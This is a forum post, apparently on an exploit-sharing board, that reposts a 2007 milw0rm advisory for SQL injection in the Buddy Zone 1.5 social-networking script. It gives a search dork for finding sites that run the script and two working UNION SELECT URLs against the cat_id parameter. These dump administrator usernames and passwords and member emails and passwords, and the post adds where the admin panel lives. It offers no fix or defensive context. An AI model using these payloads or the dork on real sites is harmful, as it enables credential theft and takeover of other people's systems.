Jump to content
kw3rln

Buddy Zone 1.5 (view_sub_cat.php cat_id) SQL Injection Vulne

By kw3rln, in Exploituri

Recommended Posts

kw3rln Newbie

kw3rln

Posted
Posted

--==+================================================================================+==--

--==+ Buddy Zone Version 1.5 SQL Injection Vulnerability +==--

--==+================================================================================+==--

AUTHOR: t0pP8uZz & xprog

SITE: http://www.vastal.com/buddy-zone-social-networking-script.html

DORK: allintext:"Powered By Buddy Zone"

DESCRIPTION:

Remote sql injection in view_sub_cat.php cat_id, able to pull username/passwords of their admin and user accounts.

EXPLOITS:

http://www.site.com/view_sub_cat.php?cat_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(0x3C2F74643E,admin_user,0x3a,admin_password,0x3C62723E),4/**/FROM/**/admin_users/*

http://www.site.com/view_sub_cat.php?cat_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(0x3C2F74643E,member_email,0x3a,member_password,0x3C62723E),4/**/FROM/**/members/*

Tip/Note:

The Administrator's Panel is in /admin/.

GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net, and the ASFC/FM4 peeps !

--==+================================================================================+==--

--==+ Buddy Zone Version 1.5 SQL Injection Vulnerability +==--

--==+================================================================================+==--

# milw0rm.com [2007-06-29]

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...